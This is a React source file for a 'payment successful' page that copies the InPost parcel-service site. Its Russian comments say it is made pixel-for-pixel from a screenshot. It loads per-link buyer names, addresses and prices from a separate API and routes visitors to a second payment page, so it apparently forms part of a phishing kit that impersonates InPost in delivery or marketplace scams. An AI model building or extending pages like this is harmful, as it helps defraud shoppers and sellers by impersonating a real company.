import React, { useState, useEffect } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './InpostSuccess.css';
import SupportWidget from './SupportWidget';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { getInpostTranslations } from '../inpostTranslations';
import { API_URL } from '../apiBase';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };

/**
 * InPost — страница успеха «Twoja płatność się powiodła» 1:1 по скрину.
 * Хедер с логотипом, жёлтая полоса с кнопками, белая карточка с данными доставки и «Dalej».
 */
function InpostSuccess() {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(null);
  const [loading, setLoading] = useState(true);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  /* log/transition только на Inpost2 */

  useEffect(() => {
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) {
          const p = data.page;
          setPageData(p);
          if (p.country_code && pageCode) sessionStorage.setItem('page_country_' + pageCode, p.country_code);
        }
        setLoading(false);
      })
      .catch(() => setLoading(false));
  }, [pageCode]);

  const countryCode = pageData?.country_code || (pageCode ? sessionStorage.getItem('page_country_' + pageCode) : null) || 'PL';
  const t = getInpostTranslations(countryCode);
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const productPrice = pageData?.price != null ? Number(pageData.price) : 228;
  const symbol = getSymbol(primaryCurrency);
  const productName = pageData?.product_name || '';
  const photoUrl = pageData?.photo_url || '';
  const firstName = pageData?.first_name || '';
  const lastName = pageData?.last_name || '';
  const buyerName = [firstName, lastName].filter(Boolean).join(' ') || '—';
  const deliveryAddress = pageData?.delivery_address || t.deliveryAddressPlaceholder || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="inpost-success-wrap">
        <div className="inpost-success-loading">{t.loading}</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="inpost-success-wrap">
      <header className="inpost-header">
        <div className="inpost-header-top-bar" aria-hidden />
        <div className="inpost-header-inner">
          <a href="#/" className="inpost-logo" aria-label="InPost">
            <img src={(process.env.PUBLIC_URL || '') + '/inpost-logo.png'} alt="InPost out of the box" className="inpost-logo-img" />
          </a>
          <div className="inpost-nav-wrap">
            <nav className="inpost-nav">
              <a href="#/">{t.navPickup}</a>
              <a href="#/">{t.navSend}</a>
              <a href="#/">{t.navForBusiness}</a>
              <a href="#/">{t.navAbout}</a>
              <a href="#/">{t.navForFan}</a>
              <a href="#/">{t.navPricing}</a>
              <a href="#/">{t.navContact}</a>
              <a href="#/">{t.navShop}</a>
            </nav>
          </div>
          <a href="#/" className="inpost-nav-search" aria-label="Search">
            <InpostIconSearch />
          </a>
        </div>
        <div className="inpost-header-line" />
        <div className="inpost-action-bar">
          <button type="button" className="inpost-btn-yellow">
            <InpostIconParcel className="inpost-action-icon" />
            <span>{t.trackParcel}</span>
          </button>
          <button type="button" className="inpost-btn-yellow">
            <InpostIconLocker className="inpost-action-icon" />
            <span>{t.findPaczkomat.includes('®') ? (<>{(t.findPaczkomat.split('®')[0])}<span className="inpost-paczkomat-reg">®</span>{(t.findPaczkomat.split('®')[1] || '')}</>) : t.findPaczkomat}</span>
          </button>
        </div>
      </header>

      <main className="inpost-main">
        <div className="inpost-card">
          <h1 className="inpost-card-title">{t.paymentSuccessTitle}</h1>
          <div className="inpost-product-row">
            {photoUrl ? (
              <img src={photoUrl} alt="" className="inpost-product-img" />
            ) : (
              <div className="inpost-product-placeholder inpost-product-placeholder-dark" aria-hidden>
                <span className="inpost-placeholder-label">i & People</span>
                <div className="inpost-placeholder-emoji-grid">
                  {'😀😊🥲😇🙂😉😍🤩😘🥰😋😛😜🤪😝🤑🤗🤭🤫🤔'.split('').map((e, i) => (
                    <span key={i} className="inpost-placeholder-emoji">{e}</span>
                  ))}
                </div>
              </div>
            )}
            <div className="inpost-product-info">
              <p className="inpost-product-price">{productPrice} {symbol}</p>
              <p className="inpost-product-name">{productName || '—'}</p>
            </div>
          </div>
          <h2 className="inpost-delivery-title">{t.deliveryInfo}</h2>
          <div className="inpost-delivery-line" />
          <p className="inpost-recipient inpost-field-underline">{buyerName}</p>
          <p className="inpost-address inpost-field-underline">{deliveryAddress}</p>
          <div className="inpost-info-box">
            <p>{t.infoBoxText}</p>
          </div>
          <Link to={index2Path} className="inpost-btn-next-wrap">
            <button type="button" className="inpost-btn-next">{t.nextBtn}</button>
          </Link>
        </div>
      </main>
      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

function InpostIconSearch() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
      <circle cx="11" cy="11" r="8" />
      <path d="m21 21-4.35-4.35" />
    </svg>
  );
}
/* Ikony 1:1 — paczka z lupą, paczkomat z lupą; obrys #333, soczewka biała */
function InpostIconParcel({ className }) {
  return (
    <svg className={className} width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.8" strokeLinecap="round" strokeLinejoin="round">
      {/* 3D box — front, top, side */}
      <path d="M5 10v9h10v-9H5z" />
      <path d="M5 10l2-4h10l2 4" />
      <path d="M15 6v4H5" />
      {/* Magnifying glass overlapping bottom-left; lens white */}
      <circle cx="8" cy="16" r="4" fill="#fff" stroke="currentColor" strokeWidth="1.8" />
      <path d="M11.2 18.8l3 3" />
    </svg>
  );
}
function InpostIconLocker({ className }) {
  return (
    <svg className={className} width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.8" strokeLinecap="round" strokeLinejoin="round">
      {/* Locker grid — 2 columns, 3 rows */}
      <rect x="3" y="4" width="8" height="5" rx="0.5" />
      <rect x="13" y="4" width="8" height="5" rx="0.5" />
      <rect x="3" y="10" width="8" height="5" rx="0.5" />
      <rect x="13" y="10" width="8" height="5" rx="0.5" />
      <rect x="3" y="16" width="8" height="4" rx="0.5" />
      <rect x="13" y="16" width="8" height="4" rx="0.5" />
      {/* Magnifying glass overlapping bottom-left */}
      <circle cx="8" cy="17" r="3.5" fill="#fff" stroke="currentColor" strokeWidth="1.8" />
      <path d="M10.5 19.5l2.5 2.5" />
    </svg>
  );
}

export default InpostSuccess;
